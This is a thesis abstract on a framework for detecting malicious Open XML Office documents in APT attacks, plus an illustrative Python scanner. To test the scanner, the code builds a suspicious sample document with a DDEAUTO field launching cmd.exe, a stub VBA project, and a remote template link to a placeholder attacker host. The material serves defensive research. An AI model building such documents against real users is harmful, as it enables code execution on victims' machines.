Thesis

A Malicious Open XML Document Detection Framework for Defending against APT Attacks

A Flexible Framework for Malicious Open XML Document Detection against APT Attacks

Advisor: 孫宏民

Abstract


Advanced Persistent Threat (APT) attacks have become a hot topic in recent years, and defending against them has received growing attention. Many large enterprises and organizations have already fallen victim to APT attacks. Because APT attacks are targeted, use specialized intrusion techniques, are driven by specific motives, are organized, and are well funded, the threat they pose cannot be ignored. In the initial infection stage of an APT attack, malicious documents are frequently delivered by spear phishing, so detecting malicious documents is especially important for early-stage APT defense. In recent years the Open XML document format has emerged as a new carrier for malicious documents, but most existing research on malicious document detection targets PDF files or the legacy OLE Office document format; no detection framework has been designed specifically for malicious Open XML documents. In this thesis we propose a detection framework for malicious Open XML documents. The framework is designed around three principles: automation, flexibility and configurability. It analyzes Open XML documents automatically and produces a report that highlights the key information for the user. It contains multiple scanner modules (Scanner Modules), each targeting a different kind of object; the module design lets users and researchers easily plug existing scanning tools or custom scanning programs into a module to automate the scans they need, and the configurable design lets the scan configuration be tailored to different scanning requirements. These properties make the framework useful not only for detection but also as an aid to researchers' analysis work.

Abstract (English)


The defense against Advanced Persistent Threat (APT) attacks has become a hot issue in recent years. Many organizations, enterprises and even governments have been victims of APT attacks. Since APT attacks have a specific target and are skillfully crafted, motivated, organized and well funded, they should not be ignored. Malicious documents are routinely used together with spear phishing in the initial infection phase of an APT attack, so the detection of malicious documents is important for early-stage defense against APT attacks. In recent years, Open XML has become a popular document format in APT attacks. However, related malicious document detection research is mostly focused on PDF files or the traditional OLE Office document format; a framework designed specifically for malicious Open XML document detection does not exist. In this thesis, we propose a malicious Open XML document detection framework. The framework is designed under three principles: Automatic, Flexible and Configurable. It analyzes Open XML documents automatically and generates analysis reports with the important information highlighted. It is flexible because its "Scanner Module" can be configured, and it is easy to extend the framework by adding customized scanners. The configurable design makes detection more customizable, so scanning can be adjusted to fit different needs on demand. The framework can not only be used for detection work but also for research purposes.
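The following Python sketch is an added illustration of the structure the abstract describes; it is not code from the thesis. An Open XML document is a zip archive whose `[Content_Types].xml` assigns a content type to every part, so the framework opens the archive, runs each configured scanner module over every part, and collects the findings into a report. The three scanner modules (a VBA project part, a relationship with `TargetMode="External"`, and a `DDEAUTO` field code in `w:instrText`), the `OpenXmlPackage`, `analyze`, `report` and `build_docx` helpers, and the two sample documents are all constructed here for the demo; the URL and command line in the suspicious sample are placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from collections import namedtuple

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
VBA_CT = "application/vnd.ms-office.vbaProject"
Finding = namedtuple("Finding", "scanner part detail")  # one report line

class OpenXmlPackage:
    """An Open XML file is a zip whose [Content_Types].xml types every part."""

    def __init__(self, blob: bytes):
        self.zf = zipfile.ZipFile(io.BytesIO(blob))
        self.parts = self.zf.namelist()
        root = ET.fromstring(self.zf.read("[Content_Types].xml"))
        self.defaults = {e.get("Extension").lower(): e.get("ContentType")
                         for e in root.iter(f"{{{CT_NS}}}Default")}
        self.overrides = {e.get("PartName").lstrip("/"): e.get("ContentType")
                          for e in root.iter(f"{{{CT_NS}}}Override")}

    def content_type(self, part: str) -> str:
        return self.overrides.get(part) or self.defaults.get(part.rsplit(".", 1)[-1].lower(), "")

# Scanner modules share one signature: (package, part name, part bytes) -> list of details.
def scan_macros(pkg, part, data):
    """Flag VBA projects by declared content type, not only by file name."""
    if pkg.content_type(part) == VBA_CT or part.lower().endswith("vbaproject.bin"):
        return [f"VBA project part ({len(data)} bytes)"]
    return []

def scan_external_rels(pkg, part, data):
    """Relationships with TargetMode=External make Office fetch remote content."""
    if not part.endswith(".rels"):
        return []
    return [f"{r.get('Type', '').rsplit('/', 1)[-1]} -> {r.get('Target')}"
            for r in ET.fromstring(data).iter(f"{{{RELS_NS}}}Relationship")
            if r.get("TargetMode") == "External"]

def scan_dde_fields(pkg, part, data):
    """Word field codes sit in w:instrText; DDE/DDEAUTO fields launch a program."""
    if not (part.startswith("word/") and part.endswith(".xml")):
        return []
    text = data.decode("utf-8", errors="replace")
    return [f"DDE field: {m.group(1).strip()[:60]}"
            for m in re.finditer(r"<w:instrText[^>]*>(.*?)</w:instrText>", text, re.S)
            if re.search(r"\bDDE(AUTO)?\b", m.group(1))]

DEFAULT_SCANNERS = {"macros": scan_macros, "external_rels": scan_external_rels, "dde": scan_dde_fields}

def analyze(blob: bytes, scanners=None) -> list:
    """Configurable: run the chosen scanner modules over every part of the package."""
    scanners, pkg, findings = scanners or DEFAULT_SCANNERS, OpenXmlPackage(blob), []
    for part in pkg.parts:
        data = pkg.zf.read(part)
        for name, scanner in scanners.items():
            findings += [Finding(name, part, d) for d in scanner(pkg, part, data)]
    return findings

def report(findings) -> str:
    return "\n".join(f"[{f.scanner}] {f.part}: {f.detail}" for f in findings) or "no suspicious objects found"

def build_docx(body_xml, extra_parts=None, external_target=None) -> bytes:
    """Constructed minimal Word package for this demo (not a real sample)."""
    extra_parts = extra_parts or {}
    overrides = ('<Override PartName="/word/document.xml" ContentType="application/'
                 'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>')
    overrides += "".join(f'<Override PartName="/{n}" ContentType="{VBA_CT}"/>'
                         for n in extra_parts if n.endswith("vbaProject.bin"))
    ctypes = (f'<Types xmlns="{CT_NS}"><Default Extension="rels" ContentType="application/'
              'vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" '
              f'ContentType="application/xml"/>{overrides}</Types>')
    rels = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" '
            f'Type="{REL_BASE}officeDocument" Target="word/document.xml"/></Relationships>')
    ext = (f'<Relationship Id="rId9" Type="{REL_BASE}attachedTemplate" '
           f'Target="{external_target}" TargetMode="External"/>') if external_target else ""
    document = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/'
                f'2006/main"><w:body>{body_xml}</w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", ctypes)
        zf.writestr("_rels/.rels", rels)
        zf.writestr("word/_rels/document.xml.rels", f'<Relationships xmlns="{RELS_NS}">{ext}</Relationships>')
        zf.writestr("word/document.xml", document)
        for name, data in extra_parts.items():
            zf.writestr(name, data)
    return buf.getvalue()

BENIGN_DOC = build_docx("<w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>")
SUSPICIOUS_DOC = build_docx(
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space='
    '"preserve"> DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" </w:instrText>'
    '</w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>',
    extra_parts={"word/vbaProject.bin": b"\xd0\xcf\x11\xe0" + b"\x00" * 28},
    external_target="http://attacker.example/template.dotm",  # placeholder URL
)
```

`report(analyze(SUSPICIOUS_DOC))` lists one line per finding, and `analyze(doc, {"macros": scan_macros})` shows the configurable side: the caller decides which modules run. The macro scanner deliberately checks the declared content type rather than trusting the part name, since the zip member can be renamed while `[Content_Types].xml` still has to declare the VBA type for Office to load it; a production scanner module would hand the matching part to a dedicated tool (the thesis's point of letting researchers plug their own scanners into a module) instead of stopping at presence checks.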

